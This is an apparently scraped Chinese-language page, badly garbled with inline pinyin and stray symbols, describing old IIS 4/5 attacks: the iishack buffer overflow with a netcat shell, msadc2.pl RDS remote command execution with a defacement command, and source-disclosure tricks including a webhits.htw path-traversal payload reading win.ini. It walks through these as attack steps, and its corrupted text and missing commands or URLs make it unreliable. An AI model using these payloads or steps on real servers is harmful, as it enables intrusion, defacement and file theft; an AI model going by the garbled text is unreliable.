1. iis4hack緩沖溢出
主要(yào)存在于.htr,.idc和(hé).stm文(wén)件(jiàn≠)中,其對(duì)關于這(zhè)些(xiē)文(wén)件(jiàn)的(de)URL請(qǐng)求沒有(y↔ǒu)對(duì)名字進行(xíng)充分(fēn)的(de)邊界檢查,導緻運行(xíng)攻擊者插入一(yī)些(→xiē)後門(mén)程序
在系統中下(xià)載和(hé)執行(xíng)程序。要(yào)檢測這(zhè)樣的(de)站($zhàn)點你(nǐ)需要(yào)兩個(gè)文(wén)件(jiàn)iishack.exe,ncx.exe,你(nǐε)可(kě)以到(dào)下(xià)面
的(de)站(zhàn)點去(qù)下(xià)載,另外(wài)你(nǐ)還(hái)需要(yào)一(φyī)台自(zì)己的(de)WEB服務器(qì)。你(nǐ)現(xiàn)在你(nǐ)自(zì)己的(de)WEB服務器(qì)上(shàng)運§行(xíng)WEB服務程序并把ncx.exe放(fàng)到(dào)你(nǐ)自(zì)己相(xiàng)應的€(de)目錄下(xià),然後使用(yòng)iishack.exe來(lái)檢查目标機(jī)器(qì):
←
c:>iishack.exe80/ncx.exe
&nb¶sp;
然後你(nǐ)就(jiù)使用(yòng)netcat來(lái)連接你(nǐ)要(yào)檢測的(de)服務器(qì):
♥
c:>nc80
如(rú)果溢出點正确你(nǐ)就(jiù)可(kě)以看(kàn)到(dào)目标機(jī)器(qì)的(de)命令行(xíng)提示,并且是(shì)管理(lǐ)遠(yuπǎn)權限。利用(yòng)程序見(jiàn)iis4hack.zip
& nbsp;
2.msadc
IIS的(de)MDAC組件(jiàn)存在一(yī)個(gè)漏洞可(kπě)以導緻攻擊者遠(yuǎn)程執行(xíng)你(nǐ)系統的(de)命令。主要(yào)核心問(wèn)題是(shì)存在于RDS
Dat™afactory,默認情況下(xià),
它允許遠(yuǎn)程命令發送到(dào)IIS服務器(qì)中,這(zhè)命令↕會(huì)以設備用(yòng)戶的(de)身(shēn)份運行(xíng),其一(yī)般默認情況下(xià)是(shì)SYSTEM用(yòng)戶。利用(yòng)程序為(wèi)msa€dc2.pl,我們看(kàn)看(kàn)它的(de)help
&n£bsp; [quack@chat quack]$ perl msadc2.pl -h ";
&n≥bsp; -- RDS smack v2 - rain forest puppy / ADM / wiretrip --
&nγbsp; Usage: msadc.pl€ -h{ -d-X -v }
& nbsp; -h= host you want to scan (ip or domain)
&n"bsp; -d= delay between calls, default ♣1 second
&n bsp; -X = dump Index Server path δtable, if available
&nb→sp; -N = query VbBusObj for NetBIOS name
&nb•sp; -V = use VbBusObj insteadσ of ActiveDataFactory
&∑nbsp; -v = verbose
&n≈bsp;   -e = external
dictionary file for step 5
≈ -u <\hostsharefile> =
use UNC file&n"bsp;
& nbsp; -w = Windows 95 instead o☆f Windows NT
£ -c = v1 compatibility (three step query)
&nb®sp; -s= run only step
 ↔;
Or a -R will re★sume a (v2) command session
&n∞bsp; [quack@chat
quack]$ perl msadc2.pl≈ -hhttp://www.targe.com/
&nb↔sp; -- RDS
smack v2 - rain forest puppy / ADM / wiretrip -- £
¥ Type the
command line you want to run (cmd /c assumed):&n☆bsp;
&nb sp; cmd /c
&nbs↑p; 如(rú)果出現(xiàn)cmd /c後,直接鍵入命令行(xíng),就(jiù)可(kě)以以system權限執行(<xíng)命令了(le)。比如(rú)xundi教的(de):
≈ echo hacked by me > d:inetpubwwwrootvictimwe&bindex.htm
↔
3.Codebrws.asp
 ₹;
察看(kàn)文(wén)件(jiàn)源代碼
♣ &∑nbsp;
4.Showcode.asp
✔ 察看(kàn)文(wén)件(jiàn)源代碼
&nbs p; &nbs♦p;
5.Null.htw
&nb↑sp;
察看(kàn)文(wén)件(jiàn)源代碼
&≈nbsp; ★
6.webhits.dll & .htw
hit-highligting功能(néng)是(shì)由Index
S™erver提供的(de)允許一(yī)個(gè)WEB用(yòng)戶在文(wén)檔上(shàng)highlighted(突出)他(tā)們原始搜索的(de)條目 ,這(zhè)個(gè)文(wén)檔的(de)名字通(tōng)過變量CiWebhitsfile傳遞給.htw文(wén)件(jiàn),Webhits.dll是(shì)一(yī)個(gè↔)ISAPI應用(yòng)程序
來(lái)處理(lǐ)請(qǐng)求,打開(kāi)文(wén)件(jiàn)并返回結果,當用(yòng)戶控制(zhì)了(le)×CiWebhitsfile參數(shù)傳遞給.htw時(shí),他(tā)們就(jiù)可(kě)以請(qǐng)求任意文(w<én)件(jiàn),結果就(jiù)是(shì)導緻查看(kàn)ASP源碼和(hé)其他(tā)腳本文(wén)件(jλiàn)內(nèi)容。要(yào)了(le)解你(nǐ)是(shì)否存在這(zhè)個(gè)漏洞,你(nǐ)可(kě)以請™(qǐng)求如(rú)下(xià)條目:
&nbsφp;
如(rú)果你(nǐ)從(cóng)服務器(qì)端獲得(de)如(rú)下(xià)信息: ≤;
&nbs&p;
format of the QUERY_STRING is
invalid這(zhè)就(≤jiù)表示你(nǐ)存在這(zhè)個(gè)漏洞 .這(zhè)個(gè)問(wèn)題主要(yào)<就(jiù)是(shì)webhits.dll關聯了(le).htw文(wén)件(jiàn)的(de)映射,所以你(nǐ)隻要(yào)取消✔
這(zhè)個(gè)映射就(jiù)能(néng)避免這(zhè)個(gè)漏洞,你(nǐ)可(kě)以在你(nǐ)認為(wèi♥)有(yǒu)漏洞的(de)系統中搜索.htw文(wén)件(jiàn),一(yī)般會(huì)發現(xiàn)如≈(rú)下(xià)的(de)程序:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw
(這(zhè)個(gè)一(yī)般為(wèi)loopbacεk使用(yòng))
一(yī)個(gè)攻擊者可(kě)以使用(yòng)如(rú)下(xià)的(de)方法來(lái)訪問(wèn)系統中文(wén)件(jiàn)的(de)內(nèi)容:   ;
ciwebhitsfile=/../../winnt/win.ini&cirestriction=≤none&cihilitetype=full
就(jiù)會(huì)在有(yǒu)此漏洞系統中win.ini文(wén)件(jiàn)的(de)內(nèi)容。↔ 7.ASP Alternate Data Streams(::$DATA)
要(yào)查看(kàn)一(y✔ī)些(xiē).asp文(wén)件(jiàn)的(de)內(nèi)容,你(nǐ)可(kě)以請(qǐng)求如(rú)下(xià)的(de)≈URL: 你(nǐ)就(jiù)得(de)到(dào)了(le)源代碼
&>nbsp;
8.ASP Dot Bug
在請(qǐng)求的(de)URL結尾追加一(yī)個(gè)或者多(duō)個(gè)點導緻洩露ASP源代碼。&nβbsp;
☆
9.ISM.DLL
這(zhè)個(gè)漏洞是(shì)由Cerberus Information Security
tea✘m.最早發現(xiàn)的(de),它運行(xíng)在IIS4.0和(hé)5.0上(shàng)面,允許攻擊者查看(kàn)任意文(wén)件(jiàn)內≈(nèi)容和(hé)源代碼。通(tōng)過在文(wén)件(jiàn)名後面追加近(jìn)230個(gè)+或者?%™20?(這(zhè)些(xiē)表示空(kōng)格)并追加?.htr?的(de)特殊請(qǐng)求給IIS,會(huì≥)使IIS認為(wèi)客戶端請(qǐng)求的(de)是(shì)?.htr?文(wén)件(jiàn),而.htr文(wén)件(ji>àn)的(de)後綴映射到(dào)ISM.DLL
ISAPI應用(yòng)程序,這(zhè)樣IIS就(jiù)把這(zhè)個(gè≈).htr請(qǐng)求轉交給這(zhè)個(gè)DLL文(wén)件(jiàn),然後ISM.DLL 程序把傳遞過來(lái)的(de)文(wén)件(jiàn∞)打開(kāi)和(hé)執行(xíng),但(dàn)在ISM.DLL
截斷信息之前,緩沖區(qū)發 送 一(yī)個(gè)截斷開(kāi)的(de) .Htr 并會(huì)有(yǒu)一(yī)些(xiē)時(sh í)間(jiān)去(qù)返回一(yī)些(xiē)你(nǐ)要(yào)打開(kāi)的(de)文(wén)件(jiàn)內(nèi)容.≈ 除非 WEB
服務停止并重啓過,否則這(zhè)攻擊隻能(néng)有(yǒu)效執行(xíng)一(yī)次。如(rú)果已經發送過一(yī)個(gè) .h tr 請(qǐng)求到(dào)機(jī)器(qì)上(shàng),那(nà)麽這(zhè)攻擊會(huì)失效.它隻能(néng)在
ISM.DLL第一(yī)次裝入內(n↑èi)存時(shí)工(gōng)作(zuò).CNNS發現(xiàn)追加+号到(dào)沒有(yǒu)一(yī)次≤攻擊這(zhè)個(gè)問(wèn)題,可(kě)以進行(xíng)多(duō)次攻擊。

掃碼立即溝通(tōng)
公衆号加關注